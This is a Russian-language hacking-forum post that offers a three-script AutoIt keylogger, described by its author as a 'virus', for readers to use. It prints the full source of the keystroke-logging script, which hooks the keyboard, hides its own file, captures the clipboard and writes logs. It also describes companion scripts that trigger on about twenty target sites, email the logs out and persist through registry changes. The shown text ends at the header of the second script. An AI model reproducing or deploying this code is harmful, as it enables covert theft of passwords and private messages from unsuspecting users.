Старый 11.02.2012, 15:42   #1
SeOqsss
RAM 16MB
 
Аватар для SeOqsss
 
Регистрация: 28.11.2011
Сообщений: 30
SeOqsss на пути к лучшему
SeOqsss вне форума

По умолчанию Keyloger Detektors Site (by SwAp)


Доброго времени суток!
В данной теме приведу пример кейлогера наскриптовом языке Autoit Keyloger Detektors Site v1.0 by SwAp.
Данный кейлогер будет писать логи только при открытие определённых страниц сайтов,в принципе он тупа ловит заголовки активных окон,ищет в них определённые слова и еслинаходит запускает запись в лог файл,по истечению определённого вами времени,он останавливает запись лога,отправляет лог файл на почту и снова начинает читать заголовки активных окон в поиске нужных слов.
Я так думаю всё остальное будет лишним,ведь в рельности не так то уж и интрересно будет читать переписку Феди с Ваней,или ещё кого либо,самое главное логи и логи от каких нить ресурсов с которых можно что то взять,все остальное ни к чему и именно по этому этот кейлогер будет стартовать только когда поймает нужный заголовок,тем самым будет писать только то что нужно.
Всё просто до безобразие и самое главное работает))
Данный кейлогер настроен под чуть 20 сайтов,ну список сайтов можно увеличить,в коментарии к самому скрипту будет описано как это сделать,если что всё же будет не понятно,можете смело задавать вопросы ниже.
И так сами скрипыт не много раскоментированны так что думаю если вы будете внимательно смотреть в них то всё будет понятно.
1 скрипт это сам кейлогер который пишет нажатые клавиши в лог файл wincl.au3
Код:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  [#[ Keyloger Site detektors 1.0 beta ® by SwAp Specially for TheHackWorld.iN ©]#]  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Данный вирус был написан специально для пользователей нашего нового ресурса посвященного теме безопасности в сети интернет TheHackWorld.iN
;Вирус состоит из трёх скриптов:
;stisx.au3 - скрипт который собирает не много информации о такчке на которой он запущен и детектит заголовки активных оконо и при нахождение нужного окна запускает сам кейлогер который пишет лог
;после ждёт некоротый промежуток времени(который вы укажите),останавливает работу кейлогера и отправляет отчет на почтовый ящик который вы укажите,после весь процесс повторяется.
;wincl.au3 - скрипт по сути является самим кейлогером,пишет символы в файл лога
;alsol.au3 - скрипт носитель,является носителем двух пред идущих скриптов,при запуске его он устанавливает пред идущие скрипты и запускает stisx.au3,так же вносит некоторые изменения в системе
;то есть правит пару ключей реестра и создаёт правило которое то и запускает наш кейлогер при каждом входе в систему.
;По сути все скрипты написаны предельно просто и будут просто замечательным (на мой взгляд) вирусом который можно сделать самому не зная ни какого языка программирования.
;                                                                          SwAp Specially for TheHackWorld.iN ©
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
#NoTrayIcon
#include <Misc.au3>
#include <inet.au3>
#include <Date.au3>
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;Данный скрипт по сути кейлогер,который будет вписывать нажатые клавиши в файл лога,его не трогаем вообще,здесь всё вроде норм.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Global $hStub_KeyProc = DllCallbackRegister("_Key_Proc", "int", "int;ptr;ptr")
Global $hMod = DllCall("kernel32.dll", "hwnd", "GetModuleHandle", "ptr", 0)
Global $hHook = DllCall("user32.dll", "hwnd", "SetWindowsHookEx", "int", $WH_KEYBOARD_LL, _
    "ptr", DllCallbackGetPtr($hStub_KeyProc), "hwnd", $hMod[0], "dword", 0)
    $log = @WindowsDir & "\swnc\"&@UserName&"-log.sft"
$date=_Now()
$bak = ClipGet()
filesetattrib ( @scriptname, "+h")
FileOpen($log, 1)
_OnStart()

While 1
    Sleep(100)
WEnd

Func _EvaluateKey_Proc($nKeyCode)
    Local $sChar
;~ MsgBox(64,Chr($nKeyCode), $nKeyCode, 1) ;с помощью этого узнаем код нужной нам клавиши (только без shift, а то будет зависание)

    Switch $nKeyCode
      Case 37 To 40, 160 To 162, 219 To 222, 65 To 93, 48 To 57, 186 To 192, 96 to 105,111,109,107,106,13,32,8,9,110,20,27,46,255

            Switch _WinGetKeyboardLayout(WinGetHandle('[Active]'))
                Case 0409 ;Если раскладка английская
                    If _IsPressed(10) Then ; если нажата клавиша Shift
                        $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aEngShift_Codes)
                    Else ; если не нажата клавиша Shift
                        $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aEng_Codes)
                    EndIf
                    ;FileWrite($log, "<font color=green style=font-size:13px>{En}</font>");можно раскаментировать строку и после\перед каждым символом будет выводится раскладка.
                Case 0419 ;Если расскладка русская
                    If _IsPressed(10) Then ; если нажата клавиша Shift
                        $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aRusShift_Codes)
                    Else ; если не нажата клавиша Shift
                        $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aRus_Codes)
                    EndIf
                  ; FileWrite($log, "<font color=green style=font-size:13px>{Ru}</font>");можно раскаментировать строку и после\перед каждым символом будет выводится раскладка.
                Case 0422 ;Если расскладка украинская
                    If _IsPressed(10) Then ; если нажата клавиша Shift
                        $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aUkrShift_Codes)
                    Else ; если не нажата клавиша Shift
                        $sChar=_ReplaceKeyCode_Proc($nKeyCode, $aCapture_Codes, $aUkr_Codes)
                    EndIf
            ; FileWrite($log, "<font color=green style=font-size:13px>{UK}</font>");можно раскаментировать строку и после\перед каждым символом будет выводится раскладка.
            EndSwitch
            FileWrite($log, $sChar)
      Case Else ; если была нажата не буква и не цыфра, то выход из функции
        FileWrite($log, "<font color=#ff0000 style=font-size:15px> #ХЗ №: "& $nKeyCode&" # </font>")
            Return
    EndSwitch
EndFunc

Func _Key_Proc($nCode, $wParam, $lParam)
    Local $aRet, $KEYHOOKSTRUCT

    If $nCode < 0 Then
        $aRet = DllCall("user32.dll", "long", "CallNextHookEx", "hwnd", $hHook[0], "int", $nCode, "ptr", $wParam, "ptr", $lParam)
        Return $aRet[0]
    EndIf

    If $wParam = 256 Then
        $KEYHOOKSTRUCT = DllStructCreate("dword;dword;dword;dword;ptr", $lParam)
        _EvaluateKey_Proc(DllStructGetData($KEYHOOKSTRUCT, 1))
    EndIf

    $aRet = DllCall("user32.dll", "long", "CallNextHookEx", "hwnd", $hHook[0], "int", $nCode, "ptr", $wParam, "ptr", $lParam)
    Return $aRet[0]
EndFunc

;Функция для замены кодов нажатых клавиш с массива
Func _ReplaceKeyCode_Proc($nKeyCode, $aSearch_Array, $aReplace_Array)
    For $i = 1 To $aSearch_Array[0]
        If $nKeyCode==$aSearch_Array[$i]Then
            Return $aReplace_Array[$i]
        EndIf
    Next
EndFunc

;функция позволяет узнать язык текущей расскладки клавиатуры
Func _WinGetKeyboardLayout($hWnd)
$hWnd = WinGetHandle(WinActive(""))
    Local $aRet = DllCall("user32.dll", "long", "GetWindowThreadProcessId", "hwnd", $hWnd, "ptr", 0)
    $aRet = DllCall("user32.dll", "long", "GetKeyboardLayout", "long", $aRet[0])

    Return "0000" & Hex($aRet[0], 4)
EndFunc
 
func _OnStart()
Global $aEng_Codes[81]
$aEng_Codes[0]=80 ;общее количество активных ячеек в массиве
$aEng_Codes[1]="`"
$aEng_Codes[2]="q"
$aEng_Codes[3]="w"
$aEng_Codes[4]="e"
$aEng_Codes[5]="r"
$aEng_Codes[6]="t"
$aEng_Codes[7]="y"
$aEng_Codes[8]="u"
$aEng_Codes[9]="i"
$aEng_Codes[10]="o"
$aEng_Codes[11]="p"
$aEng_Codes[12]="["
$aEng_Codes[13]="]"
$aEng_Codes[14]="a"
$aEng_Codes[15]="s"
$aEng_Codes[16]="d"
$aEng_Codes[17]="f"
$aEng_Codes[18]="g"
$aEng_Codes[19]="h"
$aEng_Codes[20]="j"
$aEng_Codes[21]="k"
$aEng_Codes[22]="l"
$aEng_Codes[23]=";"
$aEng_Codes[24]="'"
$aEng_Codes[25]="z"
$aEng_Codes[26]="x"
$aEng_Codes[27]="c"
$aEng_Codes[28]="v"
$aEng_Codes[29]="b"
$aEng_Codes[30]="n"
$aEng_Codes[31]="m"
$aEng_Codes[32]=","
$aEng_Codes[33]="."
$aEng_Codes[34]="/"
$aEng_Codes[35]="1"
$aEng_Codes[36]="2"
$aEng_Codes[37]="3"
$aEng_Codes[38]="4"
$aEng_Codes[39]="5"
$aEng_Codes[40]="6"
$aEng_Codes[41]="7"
$aEng_Codes[42]="8"
$aEng_Codes[43]="9"
$aEng_Codes[44]="0"
$aEng_Codes[45]="-"
$aEng_Codes[46]="="
$aEng_Codes[47]="*"
$aEng_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
$aEng_Codes[49]=" "
$aEng_Codes[50]='0'
$aEng_Codes[51]="1"
$aEng_Codes[52]="2"
$aEng_Codes[53]="3"
$aEng_Codes[54]="4"
$aEng_Codes[55]="5"
$aEng_Codes[56]="6"
$aEng_Codes[57]="7"
$aEng_Codes[58]="8"
$aEng_Codes[59]="9"
$aEng_Codes[60]="/"
$aEng_Codes[61]="-"
$aEng_Codes[62]="+"
$aEng_Codes[63]="{Shift L}"
$aEng_Codes[64]="{'\'}"
$aEng_Codes[65]="{'backspace'}"
$aEng_Codes[66]="{CTRL}"
$aEng_Codes[67]="{Shift R}"
$aEng_Codes[68]="{Win L}"
$aEng_Codes[69]="{Win R}"
$aEng_Codes[70]="{Contecst menu}"
$aEng_Codes[71]="{'ESC'}"
$aEng_Codes[72]="{Caps Lock}"
$aEng_Codes[73]="{Del else ','}"
$aEng_Codes[74]="{'Delete'}"
$aEng_Codes[75]="{'NumLock'}"
$aEng_Codes[76]="{'Tab'}"
$aEng_Codes[77]="{'^'}"
$aEng_Codes[78]="{'>'}"
$aEng_Codes[79]="{'v'}"
$aEng_Codes[80]="{'<'}"

Global $aEngShift_Codes[81]
$aEngShift_Codes[0]=80
$aEngShift_Codes[1]="~"
$aEngShift_Codes[2]="Q"
$aEngShift_Codes[3]="W"
$aEngShift_Codes[4]="E"
$aEngShift_Codes[5]="R"
$aEngShift_Codes[6]="T"
$aEngShift_Codes[7]="Y"
$aEngShift_Codes[8]="U"
$aEngShift_Codes[9]="I"
$aEngShift_Codes[10]="O"
$aEngShift_Codes[11]="P"
$aEngShift_Codes[12]="{"
$aEngShift_Codes[13]="}"
$aEngShift_Codes[14]="A"
$aEngShift_Codes[15]="S"
$aEngShift_Codes[16]="D"
$aEngShift_Codes[17]="F"
$aEngShift_Codes[18]="G"
$aEngShift_Codes[19]="H"
$aEngShift_Codes[20]="J"
$aEngShift_Codes[21]="K"
$aEngShift_Codes[22]="L"
$aEngShift_Codes[23]=":"
$aEngShift_Codes[24]='"'
$aEngShift_Codes[25]="Z"
$aEngShift_Codes[26]="X"
$aEngShift_Codes[27]="C"
$aEngShift_Codes[28]="V"
$aEngShift_Codes[29]="B"
$aEngShift_Codes[30]="N"
$aEngShift_Codes[31]="M"
$aEngShift_Codes[32]="<"
$aEngShift_Codes[33]=">"
$aEngShift_Codes[34]="?"
$aEngShift_Codes[35]="!"
$aEngShift_Codes[36]="@"
$aEngShift_Codes[37]="#"
$aEngShift_Codes[38]="$"
$aEngShift_Codes[39]="%"
$aEngShift_Codes[40]="^"
$aEngShift_Codes[41]="&"
$aEngShift_Codes[42]="*"
$aEngShift_Codes[43]="("
$aEngShift_Codes[44]=")"
$aEngShift_Codes[45]="_"
$aEngShift_Codes[46]="+"
$aEngShift_Codes[47]="*"
$aEngShift_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
$aEngShift_Codes[49]=" "
$aEngShift_Codes[50]='0'
$aEngShift_Codes[51]="1"
$aEngShift_Codes[52]="2"
$aEngShift_Codes[53]="3"
$aEngShift_Codes[54]="4"
$aEngShift_Codes[55]="5"
$aEngShift_Codes[56]="6"
$aEngShift_Codes[57]="7"
$aEngShift_Codes[58]="8"
$aEngShift_Codes[59]="9"
$aEngShift_Codes[60]="/"
$aEngShift_Codes[61]="-"
$aEngShift_Codes[62]="+"
$aEngShift_Codes[63]="{Shift L}"
$aEngShift_Codes[64]="{|}"
$aEngShift_Codes[65]="{'backspace'}"
$aEngShift_Codes[66]="{CTRL}"
$aEngShift_Codes[67]="{Shift R}"
$aEngShift_Codes[68]="{Win L}"
$aEngShift_Codes[69]="{Win R}"
$aEngShift_Codes[70]="{Contecst menu}"
$aEngShift_Codes[71]="{'ESC'}"
$aEngShift_Codes[72]="{Caps Lock}"
$aEngShift_Codes[73]="{'Del'}"
$aEngShift_Codes[74]="{'Delete'}"
$aEngShift_Codes[75]="{'NumLock'}"
$aEngShift_Codes[76]="{'Tab'}"
$aEngShift_Codes[77]="{'^'}"
$aEngShift_Codes[78]="{'>'}"
$aEngShift_Codes[79]="{'v'}"
$aEngShift_Codes[80]="{'<'}"

Global $aRus_Codes[81]
$aRus_Codes[0]=80
$aRus_Codes[1]="ё"
$aRus_Codes[2]="й"
$aRus_Codes[3]="ц"
$aRus_Codes[4]="у"
$aRus_Codes[5]="к"
$aRus_Codes[6]="е"
$aRus_Codes[7]="н"
$aRus_Codes[8]="г"
$aRus_Codes[9]="ш"
$aRus_Codes[10]="щ"
$aRus_Codes[11]="з"
$aRus_Codes[12]="х"
$aRus_Codes[13]="ъ"
$aRus_Codes[14]="ф"
$aRus_Codes[15]="ы"
$aRus_Codes[16]="в"
$aRus_Codes[17]="а"
$aRus_Codes[18]="п"
$aRus_Codes[19]="р"
$aRus_Codes[20]="о"
$aRus_Codes[21]="л"
$aRus_Codes[22]="д"
$aRus_Codes[23]="ж"
$aRus_Codes[24]="э"
$aRus_Codes[25]="я"
$aRus_Codes[26]="ч"
$aRus_Codes[27]="с"
$aRus_Codes[28]="м"
$aRus_Codes[29]="и"
$aRus_Codes[30]="т"
$aRus_Codes[31]="ь"
$aRus_Codes[32]="б"
$aRus_Codes[33]="ю"
$aRus_Codes[34]="."
$aRus_Codes[35]="1"
$aRus_Codes[36]="2"
$aRus_Codes[37]="3"
$aRus_Codes[38]="4"
$aRus_Codes[39]="5"
$aRus_Codes[40]="6"
$aRus_Codes[41]="7"
$aRus_Codes[42]="8"
$aRus_Codes[43]="9"
$aRus_Codes[44]="0"
$aRus_Codes[45]="-"
$aRus_Codes[46]="="
$aRus_Codes[47]="*"
$aRus_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
$aRus_Codes[49]=" "
$aRus_Codes[50]='0'
$aRus_Codes[51]="1"
$aRus_Codes[52]="2"
$aRus_Codes[53]="3"
$aRus_Codes[54]="4"
$aRus_Codes[55]="5"
$aRus_Codes[56]="6"
$aRus_Codes[57]="7"
$aRus_Codes[58]="8"
$aRus_Codes[59]="9"
$aRus_Codes[60]="/"
$aRus_Codes[61]="-"
$aRus_Codes[62]="+"
$aRus_Codes[63]="{Shift L}"
$aRus_Codes[64]="{'\'}"
$aRus_Codes[65]="{'backspace'}"
$aRus_Codes[66]="{CTRL}"
$aRus_Codes[67]="{Shift R}"
$aRus_Codes[68]="{Win L}"
$aRus_Codes[69]="{Win R}"
$aRus_Codes[70]="{Contecst menu}"
$aRus_Codes[71]="{'ESC'}"
$aRus_Codes[72]="{Caps Lock}"
$aRus_Codes[73]="{, else Del}"
$aRus_Codes[74]="{'Delete'}"
$aRus_Codes[75]="{'NumLock'}"
$aRus_Codes[76]="{'Tab'}"
$aRus_Codes[77]="{'^'}"
$aRus_Codes[78]="{'>'}"
$aRus_Codes[79]="{'v'}"
$aRus_Codes[80]="{'<'}"

Global $aRusShift_Codes[81]
$aRusShift_Codes[0]=80
$aRusShift_Codes[1]="Ё"
$aRusShift_Codes[2]="Й"
$aRusShift_Codes[3]="Ц"
$aRusShift_Codes[4]="У"
$aRusShift_Codes[5]="К"
$aRusShift_Codes[6]="Е"
$aRusShift_Codes[7]="Н"
$aRusShift_Codes[8]="Г"
$aRusShift_Codes[9]="Ш"
$aRusShift_Codes[10]="Щ"
$aRusShift_Codes[11]="З"
$aRusShift_Codes[12]="Х"
$aRusShift_Codes[13]="Ъ"
$aRusShift_Codes[14]="Ф"
$aRusShift_Codes[15]="Ы"
$aRusShift_Codes[16]="В"
$aRusShift_Codes[17]="А"
$aRusShift_Codes[18]="П"
$aRusShift_Codes[19]="Р"
$aRusShift_Codes[20]="О"
$aRusShift_Codes[21]="Л"
$aRusShift_Codes[22]="Д"
$aRusShift_Codes[23]="Ж"
$aRusShift_Codes[24]="Э"
$aRusShift_Codes[25]="Я"
$aRusShift_Codes[26]="Ч"
$aRusShift_Codes[27]="С"
$aRusShift_Codes[28]="М"
$aRusShift_Codes[29]="И"
$aRusShift_Codes[30]="Т"
$aRusShift_Codes[31]="Ь"
$aRusShift_Codes[32]="Б"
$aRusShift_Codes[33]="Ю"
$aRusShift_Codes[34]=","
$aRusShift_Codes[35]="!"
$aRusShift_Codes[36]='"'
$aRusShift_Codes[37]="№"
$aRusShift_Codes[38]=";"
$aRusShift_Codes[39]="%"
$aRusShift_Codes[40]=":"
$aRusShift_Codes[41]="?"
$aRusShift_Codes[42]="*"
$aRusShift_Codes[43]="("
$aRusShift_Codes[44]=")"
$aRusShift_Codes[45]="_"
$aRusShift_Codes[46]="+"
$aRusShift_Codes[47]="*"
$aRusShift_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
$aRusShift_Codes[49]=" "
$aRusShift_Codes[50]='0'
$aRusShift_Codes[51]="1"
$aRusShift_Codes[52]="2"
$aRusShift_Codes[53]="3"
$aRusShift_Codes[54]="4"
$aRusShift_Codes[55]="5"
$aRusShift_Codes[56]="6"
$aRusShift_Codes[57]="7"
$aRusShift_Codes[58]="8"
$aRusShift_Codes[59]="9"
$aRusShift_Codes[60]="/"
$aRusShift_Codes[61]="-"
$aRusShift_Codes[62]="+"
$aRusShift_Codes[63]="{Shift L}"
$aRusShift_Codes[64]="{/}"
$aRusShift_Codes[65]="{'backspace'}"
$aRusShift_Codes[66]="{CTRL}"
$aRusShift_Codes[67]="{Shift R}"
$aRusShift_Codes[68]="{Win L}"
$aRusShift_Codes[69]="{Win R}"
$aRusShift_Codes[70]="{Contecst menu}"
$aRusShift_Codes[71]="{'ESC'}"
$aRusShift_Codes[72]="{Caps Lock}"
$aRusShift_Codes[73]="{'Del'}"
$aRusShift_Codes[74]="{'Delete'}"
$aRusShift_Codes[75]="{'NumLock'}"
$aRusShift_Codes[76]="{'Tab'}"
$aRusShift_Codes[77]="{'^'}"
$aRusShift_Codes[78]="{'>'}"
$aRusShift_Codes[79]="{'v'}"
$aRusShift_Codes[80]="{'<'}"

Global $aUkr_Codes[81]
$aUkr_Codes[0]=80
$aUkr_Codes[1]="'"
$aUkr_Codes[2]="й"
$aUkr_Codes[3]="ц"
$aUkr_Codes[4]="у"
$aUkr_Codes[5]="к"
$aUkr_Codes[6]="е"
$aUkr_Codes[7]="я"
$aUkr_Codes[8]="г"
$aUkr_Codes[9]="ш"
$aUkr_Codes[10]="щ"
$aUkr_Codes[11]="з"
$aUkr_Codes[12]="х"
$aUkr_Codes[13]="ї"
$aUkr_Codes[14]="ф"
$aUkr_Codes[15]="і"
$aUkr_Codes[16]="в"
$aUkr_Codes[17]="а"
$aUkr_Codes[18]="п"
$aUkr_Codes[19]="р"
$aUkr_Codes[20]="о"
$aUkr_Codes[21]="л"
$aUkr_Codes[22]="д"
$aUkr_Codes[23]="ж"
$aUkr_Codes[24]="є"
$aUkr_Codes[25]="н"
$aUkr_Codes[26]="ч"
$aUkr_Codes[27]="с"
$aUkr_Codes[28]="м"
$aUkr_Codes[29]="и"
$aUkr_Codes[30]="т"
$aUkr_Codes[31]="ь"
$aUkr_Codes[32]="б"
$aUkr_Codes[33]="ю"
$aUkr_Codes[34]="."
$aUkr_Codes[35]="1"
$aUkr_Codes[36]="2"
$aUkr_Codes[37]="3"
$aUkr_Codes[38]="4"
$aUkr_Codes[39]="5"
$aUkr_Codes[40]="6"
$aUkr_Codes[41]="7"
$aUkr_Codes[42]="8"
$aUkr_Codes[43]="9"
$aUkr_Codes[44]="0"
$aUkr_Codes[45]="-"
$aUkr_Codes[46]="="
$aUkr_Codes[47]="*"
$aUkr_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
$aUkr_Codes[49]=" "
$aUkr_Codes[50]='0'
$aUkr_Codes[51]="1"
$aUkr_Codes[52]="2"
$aUkr_Codes[53]="3"
$aUkr_Codes[54]="4"
$aUkr_Codes[55]="5"
$aUkr_Codes[56]="6"
$aUkr_Codes[57]="7"
$aUkr_Codes[58]="8"
$aUkr_Codes[59]="9"
$aUkr_Codes[60]="/"
$aUkr_Codes[61]="-"
$aUkr_Codes[62]="+"
$aUkr_Codes[63]="{Shift L}"
$aUkr_Codes[64]="{'\'}"
$aUkr_Codes[65]="{'backspace'}"
$aUkr_Codes[66]="{CTRL}"
$aUkr_Codes[67]="{Shift R}"
$aUkr_Codes[68]="{Win L}"
$aUkr_Codes[69]="{Win R}"
$aUkr_Codes[70]="{Contecst menu}"
$aUkr_Codes[71]="{'ESC'}"
$aUkr_Codes[72]="{Caps Lock}"
$aUkr_Codes[73]="{Del else ','}"
$aUkr_Codes[74]="{'Delete'}"
$aUkr_Codes[75]="{'NumLock'}"
$aUkr_Codes[76]="{'Tab'}"
$aUkr_Codes[77]="{'^'}"
$aUkr_Codes[78]="{'>'}"
$aUkr_Codes[79]="{'v'}"
$aUkr_Codes[80]="{'<'}"

Global $aUkrShift_Codes[81]
$aUkrShift_Codes[0]=80
$aUkrShift_Codes[1]="’"
$aUkrShift_Codes[2]="Й"
$aUkrShift_Codes[3]="Ц"
$aUkrShift_Codes[4]="У"
$aUkrShift_Codes[5]="К"
$aUkrShift_Codes[6]="Е"
$aUkrShift_Codes[7]="Я"
$aUkrShift_Codes[8]="Г"
$aUkrShift_Codes[9]="Ш"
$aUkrShift_Codes[10]="Щ"
$aUkrShift_Codes[11]="З"
$aUkrShift_Codes[12]="Х"
$aUkrShift_Codes[13]="Ї"
$aUkrShift_Codes[14]="Ф"
$aUkrShift_Codes[15]="І"
$aUkrShift_Codes[16]="В"
$aUkrShift_Codes[17]="А"
$aUkrShift_Codes[18]="П"
$aUkrShift_Codes[19]="Р"
$aUkrShift_Codes[20]="О"
$aUkrShift_Codes[21]="Л"
$aUkrShift_Codes[22]="Д"
$aUkrShift_Codes[23]="Ж"
$aUkrShift_Codes[24]="Є"
$aUkrShift_Codes[25]="Н"
$aUkrShift_Codes[26]="Ч"
$aUkrShift_Codes[27]="С"
$aUkrShift_Codes[28]="М"
$aUkrShift_Codes[29]="И"
$aUkrShift_Codes[30]="Т"
$aUkrShift_Codes[31]="Ь"
$aUkrShift_Codes[32]="Б"
$aUkrShift_Codes[33]="Ю"
$aUkrShift_Codes[34]=","
$aUkrShift_Codes[35]="!"
$aUkrShift_Codes[36]='"'
$aUkrShift_Codes[37]="№"
$aUkrShift_Codes[38]=";"
$aUkrShift_Codes[39]="%"
$aUkrShift_Codes[40]=":"
$aUkrShift_Codes[41]="?"
$aUkrShift_Codes[42]="*"
$aUkrShift_Codes[43]="("
$aUkrShift_Codes[44]=")"
$aUkrShift_Codes[45]="_"
$aUkrShift_Codes[46]="+"
$aUkrShift_Codes[47]="*"
$aUkrShift_Codes[48]='<font color=#00ffff style=font-size:14px>(Enter) Time: '&$date& ' Bufer: '&$bak&'</font><br>'
$aUkrShift_Codes[49]=" "
$aUkrShift_Codes[50]='0'
$aUkrShift_Codes[51]="1"
$aUkrShift_Codes[52]="2"
$aUkrShift_Codes[53]="3"
$aUkrShift_Codes[54]="4"
$aUkrShift_Codes[55]="5"
$aUkrShift_Codes[56]="6"
$aUkrShift_Codes[57]="7"
$aUkrShift_Codes[58]="8"
$aUkrShift_Codes[59]="9"
$aUkrShift_Codes[60]="/"
$aUkrShift_Codes[61]="-"
$aUkrShift_Codes[62]="+"
$aUkrShift_Codes[63]="{Shift L}"
$aUkrShift_Codes[64]="{/ else |}"
$aUkrShift_Codes[65]="{'backspace'}"
$aUkrShift_Codes[66]="{CTRL}"
$aUkrShift_Codes[67]="{Shift R}"
$aUkrShift_Codes[68]="{Win L}"
$aUkrShift_Codes[69]="{Win R}"
$aUkrShift_Codes[70]="{Contecst menu}"
$aUkrShift_Codes[71]="{'ESC'}"
$aUkrShift_Codes[72]="{Caps Lock}"
$aUkrShift_Codes[73]="{'Del'}"
$aUkrShift_Codes[74]="{'Delete'}"
$aUkrShift_Codes[75]="{'NumLock'}"
$aUkrShift_Codes[76]="{'Tab'}"
$aUkrShift_Codes[77]="{'^'}"
$aUkrShift_Codes[78]="{'>'}"
$aUkrShift_Codes[79]="{'v'}"
$aUkrShift_Codes[80]="{'<'}"

Global $aCapture_Codes[81]
$aCapture_Codes[0]=80 ;общее кол. акт. ячеек массива
$aCapture_Codes[1]=192
$aCapture_Codes[2]=81
$aCapture_Codes[3]=87
$aCapture_Codes[4]=69
$aCapture_Codes[5]=82
$aCapture_Codes[6]=84
$aCapture_Codes[7]=89
$aCapture_Codes[8]=85
$aCapture_Codes[9]=73
$aCapture_Codes[10]=79
$aCapture_Codes[11]=80
$aCapture_Codes[12]=219
$aCapture_Codes[13]=221
$aCapture_Codes[14]=65
$aCapture_Codes[15]=83
$aCapture_Codes[16]=68
$aCapture_Codes[17]=70
$aCapture_Codes[18]=71
$aCapture_Codes[19]=72
$aCapture_Codes[20]=74
$aCapture_Codes[21]=75
$aCapture_Codes[22]=76
$aCapture_Codes[23]=186
$aCapture_Codes[24]=222
$aCapture_Codes[25]=90
$aCapture_Codes[26]=88
$aCapture_Codes[27]=67
$aCapture_Codes[28]=86
$aCapture_Codes[29]=66
$aCapture_Codes[30]=78
$aCapture_Codes[31]=77
$aCapture_Codes[32]=188
$aCapture_Codes[33]=190
$aCapture_Codes[34]=191
$aCapture_Codes[35]=49
$aCapture_Codes[36]=50
$aCapture_Codes[37]=51
$aCapture_Codes[38]=52
$aCapture_Codes[39]=53
$aCapture_Codes[40]=54
$aCapture_Codes[41]=55
$aCapture_Codes[42]=56
$aCapture_Codes[43]=57
$aCapture_Codes[44]=48
$aCapture_Codes[45]=189
$aCapture_Codes[46]=187
$aCapture_Codes[47]=106 ;* на цифровой клавиатуре
$aCapture_Codes[48]=13 ;Код клавиши Enter
$aCapture_Codes[49]=32
$aCapture_Codes[50]=96
$aCapture_Codes[51]=97
$aCapture_Codes[52]=98
$aCapture_Codes[53]=99
$aCapture_Codes[54]=100
$aCapture_Codes[55]=101
$aCapture_Codes[56]=102
$aCapture_Codes[57]=103
$aCapture_Codes[58]=104
$aCapture_Codes[59]=105
$aCapture_Codes[60]=111
$aCapture_Codes[61]=109
$aCapture_Codes[62]=107
$aCapture_Codes[63]=160 ; добавляем с 63 позиции
$aCapture_Codes[64]=220
$aCapture_Codes[65]=8
$aCapture_Codes[66]=162 ;* на цифровой клавиатуре
$aCapture_Codes[67]=161 ;Код клавиши Enter
$aCapture_Codes[68]=91
$aCapture_Codes[69]=92
$aCapture_Codes[70]=93
$aCapture_Codes[71]=27
$aCapture_Codes[72]=20
$aCapture_Codes[73]=110
$aCapture_Codes[74]=46
$aCapture_Codes[75]=255
$aCapture_Codes[76]=9
$aCapture_Codes[77]=38
$aCapture_Codes[78]=39
$aCapture_Codes[79]=40
$aCapture_Codes[80]=37
EndFunc
Дальше скрипт который будет детектить заголовки активных окон,запускать сам кейлогер и отправлять лог на почтовый ящик,в принципе из всех 3 скриптов данного кейлогера только и надо будет редактировать под себя,то есть вносить данные от почтового ящика и устанавливать промежуток времени записи лога файл stisx.au3
Код:
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  [#[ Keyloger Site detektors 1.0 beta ® by [email protected] Specially for TheHackWorld.iN ©]#]  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Данный вирус был написан специально для пользователей нашего нового ресурса посвященного теме безопасности в сети интернет TheHackWorld.iN
;Вирус состоит из трёх скриптов:
;stisx.au3 - скрипт который собирает не много информации о такчке на которой он запущен и детектит заголовки активных оконо и при нахождение нужного окна запускает сам кейлогер который пишет лог
;после ждёт некоротый промежуток времени(который вы укажите),останавливает работу кейлогера и отправляет отчет на почтовый ящик который вы укажите,после весь процесс повторяется.
;wincl.au3 - скрипт по сути является самим кейлогером,пишет символы в файл лога
;alsol.au3 - скрипт носитель,является носителем двух пред идущих скриптов,при запуске его он устанавливает пред идущие скрипты и запускает stisx.au3,так же вносит некоторые изменения в системе
;то есть правит пару ключей реестра и создаёт правило которое то и запускает наш кейлогер при каждом входе в систему.
